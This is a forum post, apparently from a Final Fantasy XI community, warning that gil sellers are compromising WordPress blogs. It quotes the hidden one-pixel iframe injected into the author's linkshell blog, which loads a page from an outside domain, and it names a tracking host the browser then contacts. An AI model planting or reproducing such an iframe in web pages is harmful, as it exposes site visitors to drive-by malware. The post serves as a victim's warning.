I think this one is a lot bigger than ffxi.somepage etc since it was just one site. I was checking my website AVG popped up, along with IE with some remote access crap. Apparently now, gilsellers are targetting wordpress blogs. They sucessfully added an iframe to my linkshells blog. The code is the following.
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
IE7 (Vista) asked me if I wanted this code to run, I, ofcourse said no, Firefox does not prompt anything but request/sends data to s81.cnzz.com. When you go there, you have chinese webmasters something something ;w;
http://i244.photobucket.com/albums/g...g?t=1198988409
A lot of people use wordpress for blogs/ffxi related stuff so I recommend you guys check and see if anything is funny.